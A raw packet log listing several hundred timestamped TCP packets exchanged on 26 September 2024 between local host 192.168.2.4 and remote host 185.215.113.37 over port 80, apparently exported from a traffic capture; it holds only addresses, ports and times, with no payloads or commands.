Sep 26, 2024 18:27:16.821196079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821209908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821223974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821230888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821244001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821258068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821271896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821274996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821285009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821286917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821301937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821333885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821355104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821521997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821537018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821552038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821578026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821578979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821618080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821909904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821955919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.821974993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.821990013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822026968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822041988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822189093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822202921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822216988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822232008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822247028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822283030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822325945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822340965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822376966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822384119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822400093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822410107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822415113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822427034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822451115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822774887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822788954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822803020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822814941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822819948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822829008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822843075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822856903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822864056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822871923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822894096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822900057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822909117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822923899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.822925091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.822968960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823424101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823438883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823453903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823466063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823482990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823508978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823575974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823590040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823633909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823637962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823653936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823668003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823682070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823683977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823695898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.823724031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.823757887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824155092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824170113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824182987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824197054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824210882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824217081 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824224949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824239969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824254036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824264050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824269056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824282885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824287891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824299097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824312925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824318886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824336052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824388981 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824879885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824894905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824908018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824920893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824934959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824940920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824949026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824954987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824961901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824970007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824978113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.824982882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.824985981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825036049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.825078011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.825531960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825546026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825560093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825573921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825582027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.825587034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.825632095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.825659990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.944977045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945012093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945028067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945084095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945086956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945102930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945122957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945139885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945142984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945158958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945172071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945209026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945415020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945431948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945447922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945466995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945477009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945483923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945502043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945516109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945519924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945552111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945574045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.945956945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945976019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.945991993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946007967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946022987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946023941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946039915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946055889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946063042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946073055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946089029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946089029 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946106911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946157932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946191072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946377039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946393967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946444988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946449995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946460962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946476936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946490049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946517944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946619987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946634054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946649075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946687937 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946702957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946814060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946832895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946878910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946913004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946913958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946932077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.946984053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.946994066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947050095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947119951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947132111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947153091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947170019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947170019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947196960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947246075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947377920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947402954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947417974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947434902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947448969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947462082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947515965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947603941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947616100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947665930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947782040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947803974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947818041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947832108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947849035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947850943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947863102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947879076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947890043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947894096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.947913885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.947952986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948146105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948160887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948174953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948191881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948204994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948209047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948220015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948261023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948302031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948584080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948597908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948611021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948627949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948642015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948642015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948673964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948713064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948842049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948858976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948870897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948888063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948899984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948900938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948910952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948923111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948932886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948940039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.948945045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948965073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948978901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.948995113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.949054956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.949670076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949680090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949690104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949702978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949712992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949724913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949729919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.949737072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949748039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949758053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949762106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.949769974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.949805975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.949846983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.950184107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950195074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950205088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950215101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950226068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950238943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950248957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950248957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.950261116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950273991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950299025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.950325966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.950639963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950650930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950660944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:16.950695992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:16.950727940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.033495903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.033515930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.033596039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.070900917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.070969105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.071000099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.071048975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.111242056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.116089106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.350999117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351027012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351044893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351147890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351165056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351221085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351233959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351263046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351274014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351280928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351311922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351336956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351499081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351515055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351528883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351545095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351547956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351561069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351572990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351577997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351593971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351607084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351612091 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351634026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351639986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351656914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.351665020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.351707935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352499008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352513075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352525949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352540970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352555037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352569103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352579117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352582932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352598906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352607965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352612972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352627993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352633953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352643013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352658033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352660894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352673054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352685928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352689028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352705002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352715015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352720022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.352734089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.352775097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.353948116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.353962898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.353976965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.353992939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:17.354001999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:17.354007006 CEST	80	49730	185.215.113.37	192.168.2.4
